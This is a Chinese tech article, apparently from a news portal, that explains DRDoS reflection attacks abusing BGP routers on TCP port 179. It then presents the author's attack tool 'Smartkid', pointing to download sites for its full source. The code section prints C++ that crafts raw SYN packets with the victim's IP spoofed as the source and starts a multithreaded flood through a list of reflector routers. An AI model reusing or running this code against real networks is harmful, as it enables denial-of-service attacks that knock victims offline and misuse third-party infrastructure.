扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
DRDoS是英文“Distributed Reflection Denial of Servie Attack”的缩写,意思是“分布式反射拒绝服务攻击”。DRDoS方式靠的是发送带有被害者IP地址的SYN连接请求包发给攻击主机BGP。根据TCP三次握手的规则,这些计算机会向源IP(被害者)发出SYN+ACK包来响应这个请求,造成该主机忙于处理这些回应而被拒绝服务攻击。
当被害者被多个网络核心基础设施路由器攻击,所有的连接都是完全合法的SYN/ACK连接回应包,它们显示了一个TCP源端口:179。BGP是中介路由器支持的“边界网关协议”(Border Gateway Protocol)。路由器使用BGP与它们的邻居进行即时的信息交流来交换它们的路由表,这是为了通知它们彼此路由器可以在哪个IP范围内进行转交。BGP的细节并不重要, 每个良好连接的中介器都会接受它们179端口上的连接。也就是说,任何一个SYN数据包到达一个网络路由器上后,都会引出一个该路由的SYN/ACK回应包来,从而利用BGP的特性实现反射放大洪水攻击。
DRDoS与DDoS的不同之处就是不需要在实际攻击之前占领大量的傀儡机,发动DRDoS也只需花费攻击者很少的资源。这种攻击也是在伪造数据包源地址的情况下进行的,从这一点上来说,与Smurf攻击一样;而DRDoS是可以在广域网上进行的,其名称中的“R”意为反射,就是这种攻击行为最大的特点。
代码实现
为了实现DRDoS,我专门写了一个强大的综合利用工具Smartkid,实现了以下几个功能:多线程端口扫描、多线程DDoS攻击、多线程DRDoS攻击、ICMP洪水、SYN洪水、自动更新。这款工具已经开放了源代码,大家可以到www.dream2fly.net和www.xfocus.net下载,我随本文也提供了完整源代码。下面我主要根据代码来讲解一下DRDoS的实现原理,为了层次清楚,我删去了ICMP攻击部分,大家可以参看源代码。
1)首先是初始化要发送的SYN数据报首部,这样攻击线程可以只需要修改少许参数,就能达到加快攻击速度的目的,具体实现代码如下所示。
| void CDrdos::InitSynPacket() { //填充IP首部 memset((void *)&ipheader,0,sizeof(ipheader)); ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long)); ipheader.tos=0; ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); ipheader.ident=1; ipheader.frag_and_flags=0x40; ipheader.ttl=255; //最大 ipheader.proto=IPPROTO_TCP; ipheader.checksum=0; ipheader.sourceIP=inet_addr(m_target_ip); ipheader.destIP=inet_addr(m_target_ip); //填充TCP首部 memset((void *)&tcpheader,0,sizeof(tcpheader)); tcpheader.th_dport=htons(m_target_port); tcpheader.th_sport=htons(m_target_port); tcpheader.th_seq=htonl(rand()); tcpheader.th_ack=0; tcpheader.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); tcpheader.th_flag=2; //syn 00000010,修改这里来实现不同的标志位探测,是SYN、是FIN,还是ACK探测 tcpheader.th_win=htons(512); tcpheader.th_urp=0; tcpheader.th_sum=0; //填充TCP伪首部,用来计算TCP头部的效验和 memset((void *)&psdheader,0,sizeof(psdheader)); psdheader.saddr=ipheader.sourceIP; psdheader.daddr=ipheader.destIP; psdheader.mbz=0; psdheader.ptcl=IPPROTO_TCP; psdheader.tcpl=htons(sizeof(TCP_HEADER)); } |
2)在开始攻击函数start_drdos中启动一个drdosthread攻击线程:AfxBeginThread(drdosthread,NULL),实现UI层和业务层面的分离,从而提高UI反应速度。
|
void CDrdos::start_drdos(const vector<CString> &reflect_list) { m_listCounter=0; m_ncounter=0; m_pDlg=(CsmartkidDlg*)AfxGetApp()->GetMainWnd(); m_threadnum=m_pDlg->m_threadnum; strcpy(m_target_ip,m_pDlg->m_targetip.GetBuffer()); m_target_port=m_pDlg->m_drdosport; m_reflectlist=reflect_list; //开始初始化数据包 InitSynPacket(); m_mainnum=m_reflectlist.size()/m_threadnum; if(m_reflectlist.size()%m_threadnum > 0) { m_mainnum++; } m_pDlg->m_prog->SetRange(0,m_reflectlist.size()); m_pDlg->m_prog->SetStep(1); AfxBeginThread(drdosthread,NULL); } |
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者
京公网安备 11010802021500号